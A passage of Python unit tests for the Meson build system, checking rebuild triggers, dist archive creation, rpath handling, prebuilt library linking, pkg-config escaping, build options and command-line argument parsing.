meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertRebuiltTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertRebuiltTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def test_dist_hg(self):
if not shutil.which('hg'):
raise unittest.SkipTest('Mercurial not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def dist_impl(self, vcs_init):
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
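# 'meson dist' is expected to produce a .tar.xz archive plus a .sha256sum by
# default; the zip archive checked further down is only produced once it is
# requested explicitly via --formats.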
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
self.assertTrue(rpath is None)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.forbidden_target_names
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
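# Compile a single source file straight to an object file with the detected
# compiler, using MSVC-style (/Fo, /c) or GCC-style (-c, -o) flags depending
# on the compiler's argument syntax.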
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
# Build the archiver command from the detected static linker object, which
# knows the right invocation for both ar-style and MSVC lib-style tools.
link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
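# GCC/Clang-style link: position-independent code is required for shared
# objects on ELF platforms (PE and Mach-O do not need -fPIC here), and a
# soname lets the runtime linker identify the library by its base name;
# macOS uses install names instead, hence the is_osx() check below.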
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
Test that we prefer static libraries when `static: true` is
passed to dependency() with pkg-config. Can't be an ordinary test
because we need to build libs and try to find them from meson.build.
Also test that it's not a hard error to have unsatisfiable library deps,
since system libraries such as -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix()]
self.assertEqual(foo_dep.get_compile_args(), cargs)
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
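# Assert that the introspected value of the build option `name` equals `value`.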
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
for lang in ('c', 'cpp'):
for target_type in ('executable', 'library'):
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main() {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
# The test uses mocking and thus requires that
# the current process is the one to run the Meson steps.
# If we are using an external test executable (most commonly
# in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
if is_sunos():
cc = 'gcc'
else:
cc = 'cc'
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = textwrap.dedent("""\
[binaries]
c = '/usr/bin/{}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""".format(cc))
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
# tests, this test will fail, so mock the environment, pop
# it, then test.
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
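    # The two tests below check b_ndebug=if-release: the test executable prints
    # the NDEBUG setting, which must be 1 for release builds and 0 otherwise.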
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
# static libraries are not linkable with -l with msvc because meson installs them
# as .a files which unix_args_to_native will not know as it expects libraries to use
# .lib as extension. For a DLL the import library is installed as .lib. Thus for msvc
            # this test needs to use shared libraries to test the path resolving logic in the
# dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
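        # For each library-path flag style, build and install the library, build an
        # executable linking against it via LDFLAGS, then change the library and
        # check that the executable gets rebuilt.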
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
            # replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
            # assert that the user of the library will be rebuilt
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
            self.installdir = initial_installdir
            self.builddir = initial_builddir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises(subprocess.CalledProcessError) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('passed as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'static')
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.assertEqual(obj.user_options['set_sub_opt'].value, True)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['-Dfoo'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf('-Dfoo')
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.wipe()
        # It is not an error to set a wrong option for unknown subprojects or
        # languages because we have no control over which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c_args'].value, ['foo bar', 'one', 'two'])
self.wipe()
